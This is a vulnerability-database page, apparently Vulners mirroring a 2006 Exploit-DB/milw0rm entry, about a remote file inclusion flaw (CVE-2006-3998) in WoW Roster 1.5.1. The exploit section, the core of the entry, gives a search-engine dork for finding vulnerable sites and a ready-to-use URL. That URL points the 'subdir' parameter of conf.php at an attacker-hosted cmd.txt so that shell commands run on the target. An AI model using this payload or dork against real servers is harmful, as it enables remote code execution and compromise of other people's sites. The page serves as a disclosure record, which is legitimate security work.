Lucene search

K

WoW Roster 1.5.1 - 'subdir' Remote File Inclusion

๐Ÿ—“๏ธย 01 Aug 2006ย 00:00:00Reported byย skulmaticTypeย 
exploitdb
ย exploitdb
๐Ÿ”—ย www.exploit-db.com๐Ÿ‘ย 49ย Views

World of Warcraft (WoW) Roster 1.5.1 Remote File Inclusion vulnerabilit

Show more
Related
Code
ReporterTitlePublishedViews
Family
NVD
CVE-2006-3998
5 Aug 200601:04
โ€“nvd
CVE
CVE-2006-3998
5 Aug 200601:04
โ€“cve
Cvelist
CVE-2006-3998
5 Aug 200601:00
โ€“cvelist
--------------------------------------------------------------------------------
Title : WoW Roster <= 1.5.1 Remote File Include Vulnerabilities
###############################################################################
Discovered By Skulmatic
-----------------------------------------------------------------------------
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application :  World of Warcraft (WoW) Roster
URL :  http://www.wowroster.net/
-----------------------------------------------------------------------------

dork        : "wow roster version 1.5.*"
Exploit     : 
http://[target]/[wow_roster_path]/conf.php?subdir=http://[attacker]/cmd.txt?&cmd=ls           
              
------------------------------------------------------------------------------

greatz:
~~~~
# special to song hye kyo (for inspiration)
# To all members of #papmahackerlink and #hackid, OLiBekaS, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster.
-------------------------------------------------------------------------------

Contact:
~~~~~~
Nick: skulmatic
E-mail: skulmatic[at]gmail[dot]Com

--------------------------------- [ eof ] ---------------------------------------

# milw0rm.com [2006-08-01]

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4
49
.json
Report